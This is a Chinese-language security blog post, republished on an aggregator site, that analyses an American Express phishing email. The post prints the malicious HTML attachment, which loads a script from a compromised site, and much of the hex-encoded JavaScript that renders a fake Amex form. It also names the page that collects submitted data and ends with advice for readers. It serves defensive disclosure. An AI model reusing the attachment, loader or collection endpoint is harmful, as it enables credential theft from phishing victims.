Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

揭秘美国运通网络钓鱼活动

0
0

我们看到许多针对电子邮件、银行、PayPal、信用卡以及其他财务凭据的网上诈骗活动。本案例与其他许多案例略有不同,更加复杂,旨在加大反网络钓鱼工具进行分析和阻止的难度。它伪装成美国运通发送给客户有关帐户中“发生错误的消息”。

他们使用电子邮件地址和主题来吸引用户阅读电子邮件并打开附件。而很大一部分都是针对中小型企业的,因为他们希望得到比个人用户更好的回应。

现在可以通过我们的提交系统( Submissions system )提交可疑网站,电子邮件和文件。

请记住,许多电子邮件客户端,尤其是手机或平板电脑上的电子邮件客户端,仅显示“发件人”的名称,而不是<domain.com>中的名字。这就是为什么这些骗局和网络钓鱼运作良好的原因。

0,,1_09030 AENA2018_1228,01.htm VirusTotal | AnyrunApp | downloadshttps://emiuk.org/style/index VirusTotal |

此电子邮件不是来自美国运通或Amnex.com。此网络钓鱼攻击中的所有站点和公司都是假的。

电子邮件如下所示:


揭秘美国运通网络钓鱼活动

American Express钓鱼邮件

这封电子邮件有一个html附件,打开时只包含一个从远程受感染网站运行脚本的简单说明:

<!DOCTYPE html><html lang=”en”><head>
<meta http-equiv=”cleartype” content=”on”>
<meta charset=”utf-8″>
<META name=GENERATOR content=”MSHTML 11.00.9600.18860″>
<script src=”https://emiuk.org/style/index”></script>
</head>
<body style=”MARGIN: .4em”>
<p>
</p>
</body>
</html>

下载脚本,则会看到我自己无法轻松解码的编码/加密文件:

var i,t=”3c12134434f74345405955044542096827476d26c82045015524224c04934332082202d92f02f55733364372f22f34495454462075804875424d44c12023162e93052045337477276966377412f92f64524e82262072216827457447063a42f02f37727707702e47753322e76f17216722f65455292f47826867456d16c33182f04495454422f27806867486d56c63122d77377427226926347492e46467426412223e10a53c46887416d66c12007866d16c56e87343d62756837427427053a02f02f77727727722e27773382e46f87216762f43153943963912f67866887476d26c72712097826d46c13a56c06116e56773d42786506e72763e90a23c56806586106453e30a63c77496937466c76563e34d97952064146d76527246996376126e42064527827027216547377312037c82074166346356f57586e27432055057226f16626966c86542007c82023132026f96652043212073c82f97496927476c76583e20a23c46c16956e76b62007497977036563d62287466547817492f66307357312222027206516c13d22297387407926c16547336866526597472222076817286536693d52276807457447017303a62f32f33063343746383343633192e66e56547497316f66c96896f87367402e66306f06d12f86116563633323076493653303153703556243643393733216342f74106367446907656534376f66e97476576e17462f86387397312f66697566966444677927094426516636137556c17432e26357347372282012f43e80a83c26c06956e06b92047226556c33d92227387467946c86587356816526517422262037487907016563d12267456597887452f46397357392212006436107426122d76377307362d27517286943d42246877427447097393a52f52f43053343706303333653102e56e66537457386f56c36866f57397482e76386f36d12f26116543673303036423663383183703596293643353793296312f34156307486987666544386f56e27466586e47482f06387367302f26687576906474c86107266726562e66317387392262086486157456132d36416557696906306582d06287546316b06537483d12216c66127286796582242f13e60a43c86c56936e36b12077276526c23d62237327457936c16507356826546537432252007467947006543d92217406537897462f76327377342202006476177436102d26367317332d27537276953d72236867437477077383a62f82f83003383756373303623122e16e26597487356f06c06826f17337442e56316f06d32f46176563623343046493633333193713596273623313793236342f94116307496927626514366f76e67476586e07422f56377357302f26647536956434d56556416977566d12e06317317322212006446147426102d16496587696996316552d66267566386b06597443d42256d96566426967576d32272f83e50a83c96c06926e16b12047216596c43d02207397477966c56557376856506527402292087437967056573d32247436527847432f56367347302272046446187446142d56317307312d97567216913d72216897407477057383a12f92f13043333746393303693102e76e36547457386f96c16806f97327492e66336f06d32f56196543623343026433643333183783586283683383783256322f34116307426927606524356f96e87496506e27442f96367377342f86617586926495366d16176c46c92e56307317382222026416157426142d06426537696936356542d26217516376b06527453d32217326d46186c76c42242f73e60a33c92f86856546116493e50a43c32152d72d85b96906602016c77412034934542053755d93e43c26236f86407992026306c86177347393d72204135805055f14386546e17496557294306f96e27446546e87432086916573672017567392d16556e62263e43c32165b86546e16406926665d12d12d23e00a23c22132d62d75b16906662024974532043745d33e53c96206f26447942096336c86107337313d72254135805065f54326596e17406507224366f36e97406576e37432036936533752087577342d16556e52243e73c32105b06546e66456976655d72d72d63e90a33c92192d32d75b26976602064904562043885d13e62043c66216f16407912016346c76177317323d42294185845035f84336566e57466547254326f46e27476536e37432076906543882007557302d56526e72273e53c22165b46566e96426996665d72d52d03e30a83c52152d52d85b86996662094934552093995d53e42023c36216f76467982026326c76147317333d22274145865055f94316516e87406507244396f46e07496536e67442066996553932067547362d86516e02203e53c32185b96596e36496906645d82d12d53e30a13c92132d02d35b96946692092104934555d43e92d42d63e90a43c16226f26417912066306c26117397343d72224155865055f64396546e07486547214316f06e57416546e27412097537332d26556e52094165885005f55226577377086f46e27346947676552223e23c62142d22d23c62165b46576e66476916685d32d62d73e90a53c86446987662016966403d42217246517367076f46e27326967656585737296157097076567275f06d36156996e92233e40a83c06466957602006966453d22237236567367056f36e17346967606505757276177037086517295f87307536222283e30a93c36436997602096926433d22294994e86127604826586116426547292292086376c06177367313d02286306c46586147286676947872203e70a03c96d76587426182006817407437052d96537147576947613d32264326f26e67466506e07442d85447927086522222086306f06e07496516e17493d42277486587817452f26837496d86c53b12056326816157277306507493d85535424672d43822272032f4
< snipped>
87383d02276944e14386f77057992263e72662333103653943b02003283043163842084196d56597286906326136e92014547867057266547327312044386f96d17026196e67962e92074156c46c32007226936766827417372057256567366507227616566472e43c82f27033e72043c62f66416937653e80a93c02f26406937663e70a53c86446917642006976443d32296904e16147684f46286a66586357427392283e83c82f86486917683e10a73c56476967692086906403d62246944e66157655316347296907007487352233e73c42f16466927603e70a13c22f46476997603e60a83c12f76456967613e20a13c72f46466967643e60a53c02f06426957613e80a73c12f66296f36407963e30a13c32f26827406d76c83e2″,x=””;for(i=0;i<t.length;i+=3){x+=unescape(“%”+t.substr(i,2));}document.write(x);

这可以从 anyrun 报告中(文件部分)获得。

一旦在浏览器中运行,它就会显示一个看起来像这样的页面,询问大量细节,这样他们就可以完全接管你的生活。


揭秘美国运通网络钓鱼活动

虚假Amex网站

如果您填写详细信息并提交,则会将信息发送到受感染网站上的页面http://thegrovetaunton.co.uk/robo/form.php,而您以为信息被发送到正版美国运通网站。

大多数人对网络钓鱼都是非常在意的,并认为自己永远不会因为网络钓鱼而陷入困境。请不要骄傲和自大,留意任何邀请您输入个人或财务信息的网站。它可能是一封电子邮件,上面写着“您已赢得奖品”或“注册此网站以获取折扣、奖品和特别优惠”等等。

请阅读我们的“如何保护自己”( How to protect yourselves page )页面,以获取有关如何避免被这种社交工程恶意软件感染的建议。

所有这些电子邮件都会使用社交工程来说服您打开电子邮件附带的附件。它可能是一条消息说“看看我昨晚拍的这张照片”,也许发件人是来自朋友,而且这些邮件大多都是针对那些经常有可能收到PDF附件或Word .doc附件或其他日常生活中常见文件类型的人。如果中招则会直接窃取您的个人、银行、信用卡或电子邮件和社交网络登录详细信息。所以解压缩邮件时要非常小心,并确保“显示已启用的文件扩展名”,然后仔细查看解压缩的文件。如果它是.EXE,那么肯定有问题,不应该运行或打开。

电子邮件头部:


揭秘美国运通网络钓鱼活动
Received: from surge3.montanasat.net ([216.211.191.5]:59185) by my email server with esmtp (Exim 4.91) (envelope-from <<a href="/cdn-cgi/l/email-protection" data-cfemai

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images